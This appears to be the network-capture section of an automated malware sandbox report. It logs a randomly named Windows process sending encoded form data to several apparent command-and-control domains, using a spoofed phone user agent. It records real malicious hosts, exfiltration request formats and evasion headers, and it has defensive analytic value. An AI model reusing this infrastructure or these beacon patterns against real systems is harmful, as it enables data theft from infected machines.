                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      13 | 192.168.2.4 | 50414 | 47.104.180.139 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:28:17.698633909 CEST | 748 | OUT | POST /6m23/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.zhuoyueapp.top
                      Origin: http://www.zhuoyueapp.top
                      Content-Length: 205
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.zhuoyueapp.top/6m23/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 38 50 6e 65 62 77 6d 4a 61 66 49 70 44 30 69 71 64 54 75 73 4e 5a 33 67 6d 64 43 58 46 41 52 31 61 79 33 4b 66 6f 32 6c 70 70 6a 76 7a 6c 6e 72 51 6d 4c 41 46 61 48 69 72 54 5a 4d 38 67 63 6a 49 53 4d 32 43 62 70 51 6e 4f 37 4b 76 64 50 6b 67 4a 67 63 52 2f 37 54 37 2f 50 4b 35 68 2b 76 43 6c 4f 6f 6f 6a 2f 79 4d 2f 36 4e 38 62 5a 32 6f 71 66 76 56 6e 2b 67 4a 49 58 57 76 61 6b 54 43 68 68 72 58 36 34 6f 49 57 4a 69 75 4d 54 2b 7a 55 54 48 46 77 6b 52 4f 52 55 39 67 42 4e 58 57 4b 59 67 72 49 55 77 4a 5a 59 44 6c 4a 4c 39 76 37 30 69 2f 68 46 55 74 30 63 43 77 4f 4e 6b 52 51 3d 3d
                      Data Ascii: MtXH8dRH=8PnebwmJafIpD0iqdTusNZ3gmdCXFAR1ay3Kfo2lppjvzlnrQmLAFaHirTZM8gcjISM2CbpQnO7KvdPkgJgcR/7T7/PK5h+vClOooj/yM/6N8bZ2oqfvVn+gJIXWvakTChhrX64oIWJiuMT+zUTHFwkRORU9gBNXWKYgrIUwJZYDlJL9v70i/hFUt0cCwONkRQ==
                      Sep 13, 2024 12:28:18.856379986 CEST | 545 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 13 Sep 2024 10:28:18 GMT
                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                      Strict-Transport-Security: max-age=3153600000; includeSubDomains
                      X-Content-Type-Options: nosniff
                      X-XSS-Protection: 1; mode=block
                      Content-Length: 203
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 6d 32 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6m23/ was not found on this server.</p></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      14 | 192.168.2.4 | 50415 | 47.104.180.139 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:28:20.249839067 CEST | 768 | OUT | POST /6m23/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.zhuoyueapp.top
                      Origin: http://www.zhuoyueapp.top
                      Content-Length: 225
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.zhuoyueapp.top/6m23/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 38 50 6e 65 62 77 6d 4a 61 66 49 70 44 58 71 71 52 55 53 73 4c 35 33 6e 71 39 43 58 66 77 52 78 61 79 37 4b 66 73 4f 54 70 37 48 76 79 45 58 72 52 6a 2f 41 43 61 48 69 79 6a 5a 51 68 77 63 65 49 53 78 44 43 61 46 51 6e 4f 76 4b 76 66 58 6b 67 61 34 62 44 2f 37 52 7a 66 50 49 6b 78 2b 76 43 6c 4f 6f 6f 69 61 66 4d 2f 79 4e 39 6f 42 32 36 59 33 6f 5a 48 2b 6e 4f 49 58 57 6b 36 6b 66 43 68 68 4e 58 34 63 43 49 55 42 69 75 4e 6a 2b 7a 41 48 45 51 67 6b 58 41 78 56 6c 67 42 4d 63 54 2f 31 4a 74 72 45 55 4b 35 42 75 67 50 61 6e 2b 4b 56 31 74 68 68 6e 77 7a 56 32 39 4e 77 74 4b 62 64 78 46 6b 72 6b 66 62 6c 68 48 70 69 42 55 31 47 6f 66 55 30 3d
                      Data Ascii: MtXH8dRH=8PnebwmJafIpDXqqRUSsL53nq9CXfwRxay7KfsOTp7HvyEXrRj/ACaHiyjZQhwceISxDCaFQnOvKvfXkga4bD/7RzfPIkx+vClOooiafM/yN9oB26Y3oZH+nOIXWk6kfChhNX4cCIUBiuNj+zAHEQgkXAxVlgBMcT/1JtrEUK5BugPan+KV1thhnwzV29NwtKbdxFkrkfblhHpiBU1GofU0=
                      Sep 13, 2024 12:28:21.404572964 CEST | 545 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 13 Sep 2024 10:28:21 GMT
                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                      Strict-Transport-Security: max-age=3153600000; includeSubDomains
                      X-Content-Type-Options: nosniff
                      X-XSS-Protection: 1; mode=block
                      Content-Length: 203
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 6d 32 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6m23/ was not found on this server.</p></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      15 | 192.168.2.4 | 50416 | 47.104.180.139 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:28:22.796809912 CEST | 10850 | OUT | POST /6m23/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.zhuoyueapp.top
                      Origin: http://www.zhuoyueapp.top
                      Content-Length: 10305
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.zhuoyueapp.top/6m23/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 38 50 6e 65 62 77 6d 4a 61 66 49 70 44 58 71 71 52 55 53 73 4c 35 33 6e 71 39 43 58 66 77 52 78 61 79 37 4b 66 73 4f 54 70 37 50 76 7a 32 76 72 65 67 58 41 44 61 48 69 74 54 5a 41 68 77 63 50 49 53 5a 48 43 61 5a 71 6e 4d 58 4b 75 38 66 6b 31 62 34 62 5a 76 37 52 2f 2f 50 4a 35 68 2b 36 43 6c 65 73 6f 69 4b 66 4d 2f 79 4e 39 71 31 32 34 4b 66 6f 66 48 2b 67 4a 49 57 5a 76 61 6b 7a 43 68 35 7a 58 34 59 34 49 6b 68 69 74 74 7a 2b 77 31 54 45 52 41 6b 56 44 78 56 32 67 42 41 54 54 37 56 6a 74 6f 59 71 4b 37 64 75 73 71 75 35 6d 6f 5a 6f 33 41 68 43 69 69 74 2b 79 2f 49 47 54 4a 42 46 4c 31 37 64 4a 5a 74 79 64 37 33 51 4c 33 57 58 4b 55 32 7a 46 52 62 4d 42 43 6a 75 44 36 32 31 77 65 76 58 33 46 45 6d 33 47 79 70 46 78 49 78 68 44 5a 6a 41 4b 38 74 48 71 48 42 72 41 55 72 79 55 68 68 71 45 63 32 4f 4f 51 43 46 74 31 6e 69 41 36 36 6f 79 65 6f 6d 43 35 43 61 66 6c 69 71 4e 2b 78 62 4d 30 50 6f 51 52 48 5a 36 4d 33 30 6f 64 47 32 71 79 4c 73 71 75 7a 4d 6a 72 4a 32 42 7a 7a 49 [TRUNCATED]
                      Data Ascii: MtXH8dRH=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 [TRUNCATED]
                      Sep 13, 2024 12:28:23.960778952 CEST | 545 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 13 Sep 2024 10:28:23 GMT
                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                      Strict-Transport-Security: max-age=3153600000; includeSubDomains
                      X-Content-Type-Options: nosniff
                      X-XSS-Protection: 1; mode=block
                      Content-Length: 203
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 6d 32 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6m23/ was not found on this server.</p></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      16 | 192.168.2.4 | 50417 | 47.104.180.139 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:28:25.332824945 CEST | 484 | OUT | GET /6m23/?MtXH8dRH=xNP+YF7kN8YyHFbGfhCbM4vPtrObLTBpZTX0aom8zYno+17KeimnOIL9nX5Ojh8oMyFsBplL+bbJn9Xx4KkSTeDh/PbqhhexF1uqyGHiSdrf0qV82I/xPx8=&EB04T=0hSTF8phw HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.zhuoyueapp.top
                      Connection: close
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Sep 13, 2024 12:28:26.499989033 CEST | 545 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 13 Sep 2024 10:28:26 GMT
                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                      Strict-Transport-Security: max-age=3153600000; includeSubDomains
                      X-Content-Type-Options: nosniff
                      X-XSS-Protection: 1; mode=block
                      Content-Length: 203
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 6d 32 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6m23/ was not found on this server.</p></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      17 | 192.168.2.4 | 50418 | 3.33.130.190 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:28:39.642297983 CEST | 757 | OUT | POST /7d10/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.autonashville.com
                      Origin: http://www.autonashville.com
                      Content-Length: 205
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.autonashville.com/7d10/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 38 6b 67 75 47 30 2f 5a 44 62 38 37 56 52 38 79 76 50 34 2f 78 4d 6c 36 39 52 59 69 4d 61 7a 62 6d 4f 62 73 43 75 48 4f 36 51 55 47 2f 45 4a 52 56 5a 79 62 4b 2b 76 76 32 6c 30 73 70 77 57 72 6e 6b 58 32 72 53 6a 72 42 4c 34 4d 79 62 6b 59 74 7a 2b 77 31 39 75 54 44 62 7a 59 62 79 45 37 52 68 7a 4a 4d 32 2f 45 6a 33 63 4e 78 48 4e 65 69 41 47 4a 52 56 71 38 48 6f 62 72 2f 5a 63 70 59 71 79 50 44 2f 61 35 55 55 56 31 66 4d 63 4d 71 55 67 62 66 37 39 2f 67 31 36 64 77 49 54 4b 74 73 34 68 31 77 49 52 47 38 79 2b 77 66 6a 78 46 48 79 43 58 50 52 7a 79 4f 33 6b 4c 70 71 39 52 41 3d 3d
                      Data Ascii: MtXH8dRH=8kguG0/ZDb87VR8yvP4/xMl69RYiMazbmObsCuHO6QUG/EJRVZybK+vv2l0spwWrnkX2rSjrBL4MybkYtz+w19uTDbzYbyE7RhzJM2/Ej3cNxHNeiAGJRVq8Hobr/ZcpYqyPD/a5UUV1fMcMqUgbf79/g16dwITKts4h1wIRG8y+wfjxFHyCXPRzyO3kLpq9RA==


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      18 | 192.168.2.4 | 50419 | 3.33.130.190 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:28:42.178606987 CEST | 777 | OUT | POST /7d10/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.autonashville.com
                      Origin: http://www.autonashville.com
                      Content-Length: 225
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.autonashville.com/7d10/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 38 6b 67 75 47 30 2f 5a 44 62 38 37 58 78 4d 79 74 75 34 2f 32 73 6c 39 34 52 59 69 43 36 7a 66 6d 50 6e 73 43 72 72 65 36 6a 77 47 78 41 46 52 55 64 6d 62 4a 2b 76 76 78 56 31 6f 6b 51 58 6c 6e 6b 61 4c 72 54 66 72 42 50 51 4d 79 62 55 59 73 41 57 7a 30 74 75 52 4d 37 7a 61 56 53 45 37 52 68 7a 4a 4d 32 62 69 6a 33 45 4e 78 32 39 65 6a 6c 79 4b 59 31 71 2f 4e 49 62 72 31 35 63 6c 59 71 79 39 44 2b 48 53 55 58 74 31 66 4e 73 4d 70 46 67 59 56 37 39 31 76 56 37 51 68 39 69 7a 6f 4a 52 51 2f 41 63 59 42 63 32 59 34 35 79 72 55 32 54 56 46 50 31 41 76 4a 2b 51 47 71 58 30 4b 44 78 6b 52 66 52 48 4c 79 54 44 66 65 56 6f 46 42 78 45 41 4d 77 3d
                      Data Ascii: MtXH8dRH=8kguG0/ZDb87XxMytu4/2sl94RYiC6zfmPnsCrre6jwGxAFRUdmbJ+vvxV1okQXlnkaLrTfrBPQMybUYsAWz0tuRM7zaVSE7RhzJM2bij3ENx29ejlyKY1q/NIbr15clYqy9D+HSUXt1fNsMpFgYV791vV7Qh9izoJRQ/AcYBc2Y45yrU2TVFP1AvJ+QGqX0KDxkRfRHLyTDfeVoFBxEAMw=


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      19 | 192.168.2.4 | 50420 | 3.33.130.190 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:28:44.726350069 CEST | 10859 | OUT | POST /7d10/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.autonashville.com
                      Origin: http://www.autonashville.com
                      Content-Length: 10305
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.autonashville.com/7d10/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 38 6b 67 75 47 30 2f 5a 44 62 38 37 58 78 4d 79 74 75 34 2f 32 73 6c 39 34 52 59 69 43 36 7a 66 6d 50 6e 73 43 72 72 65 36 6a 34 47 78 31 5a 52 55 36 4b 62 49 2b 76 76 2b 46 31 6c 6b 51 57 35 6e 6b 53 48 72 54 54 37 42 4e 59 4d 7a 36 30 59 38 68 57 7a 39 74 75 52 4f 37 7a 58 62 79 45 75 52 68 6a 4e 4d 32 4c 69 6a 33 45 4e 78 30 6c 65 67 77 47 4b 65 31 71 38 48 6f 62 6e 2f 5a 64 4d 59 75 6d 48 44 2b 7a 6b 56 6d 4e 31 66 74 38 4d 36 48 59 59 54 72 39 7a 73 56 36 44 68 39 6d 53 6f 4e 49 76 2f 41 6f 68 42 65 71 59 36 39 6d 38 4d 32 58 4e 5a 75 46 62 2f 4a 75 50 4f 35 76 71 4d 68 68 6e 48 4b 4e 70 58 43 48 63 51 35 67 4d 41 43 70 48 66 6f 45 4b 73 2b 51 56 4b 32 75 70 71 66 6c 4a 73 53 69 6b 64 71 4a 51 75 6d 39 67 43 6d 6e 44 57 65 56 2f 2b 4a 4a 7a 4f 46 41 68 66 62 4a 37 41 34 71 38 65 32 6f 6a 57 78 39 48 6a 2b 65 74 4a 56 6a 67 73 4a 72 2b 7a 57 4a 4e 6b 30 48 30 55 69 57 55 55 37 68 6d 6a 71 6e 35 59 6e 35 6e 55 2b 54 6c 69 59 4b 69 5a 57 43 2f 65 4f 76 79 64 71 43 4b 30 [TRUNCATED]
                      Data Ascii: MtXH8dRH=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 [TRUNCATED]


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      20 | 192.168.2.4 | 50421 | 3.33.130.190 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:28:47.273588896 CEST | 487 | OUT | GET /7d10/?MtXH8dRH=xmIOFBiXVr0/QiBtlfppycp69g4gIKv/lNzUf7vC8zcE0nFiYZS2LM+232gpuz68llXfjA35BroI76gEmief8pSzBK3ZVT8efzXjLgbijVAA5nUksQudIw0=&EB04T=0hSTF8phw HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.autonashville.com
                      Connection: close
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Sep 13, 2024 12:28:47.744946957 CEST | 400 | IN | HTTP/1.1 200 OK
                      Server: openresty
                      Date: Fri, 13 Sep 2024 10:28:47 GMT
                      Content-Type: text/html
                      Content-Length: 260
                      Connection: close
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4d 74 58 48 38 64 52 48 3d 78 6d 49 4f 46 42 69 58 56 72 30 2f 51 69 42 74 6c 66 70 70 79 63 70 36 39 67 34 67 49 4b 76 2f 6c 4e 7a 55 66 37 76 43 38 7a 63 45 30 6e 46 69 59 5a 53 32 4c 4d 2b 32 33 32 67 70 75 7a 36 38 6c 6c 58 66 6a 41 33 35 42 72 6f 49 37 36 67 45 6d 69 65 66 38 70 53 7a 42 4b 33 5a 56 54 38 65 66 7a 58 6a 4c 67 62 69 6a 56 41 41 35 6e 55 6b 73 51 75 64 49 77 30 3d 26 45 42 30 34 54 3d 30 68 53 54 46 38 70 68 77 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?MtXH8dRH=xmIOFBiXVr0/QiBtlfppycp69g4gIKv/lNzUf7vC8zcE0nFiYZS2LM+232gpuz68llXfjA35BroI76gEmief8pSzBK3ZVT8efzXjLgbijVAA5nUksQudIw0=&EB04T=0hSTF8phw"}</script></head></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      21 | 192.168.2.4 | 50422 | 199.59.243.226 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:29:00.973885059 CEST | 742 | OUT | POST /m409/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.dom-2.online
                      Origin: http://www.dom-2.online
                      Content-Length: 205
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.dom-2.online/m409/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 69 69 37 58 73 74 61 4d 6f 46 71 6a 68 54 56 75 74 54 48 56 35 4e 45 4d 76 30 5a 30 35 78 4a 4b 70 6c 75 49 68 38 7a 68 74 51 33 65 6a 52 63 55 43 6d 6d 74 67 72 71 2b 78 58 4f 6a 77 76 30 47 6f 71 67 59 46 50 75 4d 35 57 52 44 4b 6d 6e 62 58 38 37 2b 4b 56 74 35 4e 79 2b 6a 4e 43 66 49 45 33 42 6f 79 48 69 30 55 75 55 38 48 75 4d 52 37 33 45 78 39 59 4b 48 7a 4d 70 43 4e 73 34 6f 52 70 57 6d 71 61 6c 6f 71 5a 7a 46 79 57 4a 62 63 65 6d 33 69 70 66 4b 6c 32 57 52 56 47 7a 67 67 74 2f 71 72 77 31 4a 47 7a 45 52 41 76 77 71 52 30 53 31 4f 2b 56 56 58 59 73 61 4f 52 62 6c 73 77 3d 3d
                      Data Ascii: MtXH8dRH=ii7XstaMoFqjhTVutTHV5NEMv0Z05xJKpluIh8zhtQ3ejRcUCmmtgrq+xXOjwv0GoqgYFPuM5WRDKmnbX87+KVt5Ny+jNCfIE3BoyHi0UuU8HuMR73Ex9YKHzMpCNs4oRpWmqaloqZzFyWJbcem3ipfKl2WRVGzggt/qrw1JGzERAvwqR0S1O+VVXYsaORblsw==
                      Sep 13, 2024 12:29:01.457920074 CEST | 1236 | IN | HTTP/1.1 200 OK
                      date: Fri, 13 Sep 2024 10:29:01 GMT
                      content-type: text/html; charset=utf-8
                      content-length: 1114
                      x-request-id: 212ee7de-d814-4b98-9aeb-6bd8cfa5d0f5
                      cache-control: no-store, max-age=0
                      accept-ch: sec-ch-prefers-color-scheme
                      critical-ch: sec-ch-prefers-color-scheme
                      vary: sec-ch-prefers-color-scheme
                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==
                      set-cookie: parking_session=212ee7de-d814-4b98-9aeb-6bd8cfa5d0f5; expires=Fri, 13 Sep 2024 10:44:01 GMT; path=/
                      connection: close
